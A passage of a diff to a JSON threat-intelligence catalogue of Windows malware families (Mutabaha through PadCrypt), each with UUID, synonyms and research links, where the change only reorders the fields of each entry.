"Murofet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", "http://vms.drweb.ru/virus/?_is=1&i=8477920" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", - "value": "Mutabaha", - "description": "" + "value": "Mutabaha" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", - "value": "MyKings Spreader", - "description": "" + "value": "MyKings Spreader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", - "value": "MyloBot", - "description": "" + "value": "MyloBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", - "value": "N40", - "description": "" + "value": "N40" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", - "value": "Nabucur", - "description": "" + "value": "Nabucur" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", - "value": "Nagini", - "description": "" + "value": "Nagini" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", - "value": "Naikon", - "description": "" + "value": "Naikon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", - "value": "Nanocore RAT", - "description": "" + "value": "Nanocore RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", - "value": "NanoLocker", - "description": "" + "value": "NanoLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", - "value": "Narilam", - "description": "" + "value": "Narilam" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", "https://www.ncsc.gov.uk/alerts/turla-group-malware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d8295eba-60ef-4900-8091-d694180de565", - "value": "Nautilus", - "description": "" + "value": "Nautilus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", - "value": "NavRAT", - "description": "" + "value": "NavRAT" }, { + "description": "", "meta": { - "synonyms": [ - "nucurs" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", @@ -10111,105 +10111,105 @@ "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/", "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/" - ] + ], + "synonyms": [ + "nucurs" + ], + "type": [] }, "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", - "value": "Necurs", - "description": "" + "value": "Necurs" }, { + "description": "", "meta": { - "synonyms": [ - "Nemain" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" - ] + ], + "synonyms": [ + "Nemain" + ], + "type": [] }, "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", - "value": "Nemim", - "description": "" + "value": "Nemim" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", - "value": "NetC", - "description": "" + "value": "NetC" }, { + "description": "", "meta": { - "synonyms": [ - "ScoutEagle" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] + ], + "synonyms": [ + "ScoutEagle" + ], + "type": [] }, "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", - "value": "NETEAGLE", - "description": "" + "value": "NETEAGLE" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger", "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", - "value": "Netrepser", - "description": "" + "value": "Netrepser" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", "http://www.netsupportmanager.com/index.asp", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", - "value": "NetSupportManager RAT", - "description": "" + "value": "NetSupportManager RAT" }, { + "description": "", "meta": { - "synonyms": [ - "TravNet" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" - ] + ], + "synonyms": [ + "TravNet" + ], + "type": [] }, "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", - "value": "NetTraveler", - "description": "" + "value": "NetTraveler" }, { + "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n", "meta": { - "synonyms": [ - "Recam" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", "https://www.circl.lu/pub/tr-23/", @@ -10217,31 +10217,31 @@ "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" - ] + ], + "synonyms": [ + "Recam" + ], + "type": [] }, "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", - "value": "NetWire RC", - "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n" + "value": "NetWire RC" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", "https://www.ncsc.gov.uk/alerts/turla-group-malware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", - "value": "Neuron", - "description": "" + "value": "Neuron" }, { + "description": "", "meta": { - "synonyms": [ - "Kasidet" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", "http://securitykitten.github.io/an-evening-with-n3utrino/", @@ -10253,157 +10253,157 @@ "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/" - ] + ], + "synonyms": [ + "Kasidet" + ], + "type": [] }, "uuid": "3760920e-4d1a-40d8-9e60-508079499076", - "value": "Neutrino", - "description": "" + "value": "Neutrino" }, { + "description": "", "meta": { - "synonyms": [ - "Jimmy" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" - ] + ], + "synonyms": [ + "Jimmy" + ], + "type": [] }, "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", - "value": "Neutrino POS", - "description": "" + "value": "Neutrino POS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", - "value": "NewCore RAT", - "description": "" + "value": "NewCore RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", "https://asert.arbornetworks.com/lets-talk-about-newposthings/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", - "value": "NewPosThings", - "description": "" + "value": "NewPosThings" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", - "value": "NewsReels", - "description": "" + "value": "NewsReels" }, { + "description": "", "meta": { - "synonyms": [ - "CT" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" - ] + ], + "synonyms": [ + "CT" + ], + "type": [] }, "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", - "value": "NewCT", - "description": "" + "value": "NewCT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot", "https://twitter.com/benkow_/status/789006720668405760" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", - "value": "Nexster Bot", - "description": "" + "value": "Nexster Bot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger", "https://twitter.com/PhysicalDrive0/status/842853292124360706", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", - "value": "NexusLogger", - "description": "" + "value": "NexusLogger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", "https://research.checkpoint.com/ramnits-network-proxy-servers/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", - "value": "Ngioweb", - "description": "" + "value": "Ngioweb" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove", "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130", - "value": "nitlove", - "description": "" + "value": "nitlove" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", - "value": "Nitol", - "description": "" + "value": "Nitol" }, { + "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.", "meta": { - "synonyms": [ - "Bladabindi" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", @@ -10411,126 +10411,128 @@ "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] + ], + "synonyms": [ + "Bladabindi" + ], + "type": [] }, "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", - "value": "NjRAT", - "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored." + "value": "NjRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer", "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", - "value": "Nocturnal Stealer", - "description": "" + "value": "Nocturnal Stealer" }, { + "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", - "value": "Nokki", - "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37." + "value": "Nokki" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6207668d-af17-44a6-97a2-e1b448264529", - "value": "Nozelesn (Decryptor)", - "description": "" + "value": "Nozelesn (Decryptor)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", "https://twitter.com/malwrhunterteam/status/910952333084971008", "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", - "value": "nRansom", - "description": "" + "value": "nRansom" }, { + "description": "", "meta": { - "synonyms": [ - "nymain" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", "https://www.cert.pl/en/news/single/nymaim-revisited/", "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", "https://bitbucket.org/daniel_plohmann/idapatchwork" - ] + ], + "synonyms": [ + "nymain" + ], + "type": [] }, "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", - "value": "Nymaim", - "description": "" + "value": "Nymaim" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2", "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", - "value": "Nymaim2", - "description": "" + "value": "Nymaim2" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", - "value": "OddJob", - "description": "" + "value": "OddJob" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", - "value": "Odinaff", - "description": "" + "value": "Odinaff" }, { + "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", @@ -10541,243 +10543,241 @@ "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", - "value": "Olympic Destroyer", - "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event." + "value": "Olympic Destroyer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", "https://twitter.com/malwrhunterteam/status/1001461507513880576" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", - "value": "OneKeyLocker", - "description": "" + "value": "OneKeyLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "82733125-da67-44ff-b2ac-b16226088211", - "value": "ONHAT", - "description": "" + "value": "ONHAT" }, { + "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. ", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html", "https://www.f-secure.com/weblog/archives/00002764.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", - "value": "OnionDuke", - "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. " + "value": "OnionDuke" }, { + "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", + "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" + ], "synonyms": [ "SBot", "Onliner" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", - "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" - ] + "type": [] }, "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", - "value": "OnlinerSpambot", - "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada." + "value": "OnlinerSpambot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", - "value": "OopsIE", - "description": "" + "value": "OopsIE" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html", "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", "https://forum.malekal.com/viewtopic.php?t=21806" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", - "value": "Opachki", - "description": "" + "value": "Opachki" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", - "value": "OpGhoul", - "description": "" + "value": "OpGhoul" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", - "value": "OpBlockBuster", - "description": "" + "value": "OpBlockBuster" }, { + "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", - "value": "OrcaRAT", - "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions." + "value": "OrcaRAT" }, { + "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", "https://orcustechnologies.com/", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", - "value": "Orcus RAT", - "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time." + "value": "Orcus RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", "https://www.gdata.de/blog/2017/11/30151-ordinypt", "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", - "value": "Ordinypt", - "description": "" + "value": "Ordinypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", - "value": "Overlay RAT", - "description": "" + "value": "Overlay RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", - "value": "OvidiyStealer", - "description": "" + "value": "OvidiyStealer" }, { + "description": "", "meta": { - "synonyms": [ - "luckyowa" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" - ] + ], + "synonyms": [ + "luckyowa" + ], + "type": [] }, "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", - "value": "owaauth", - "description": "" + "value": "owaauth" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/", 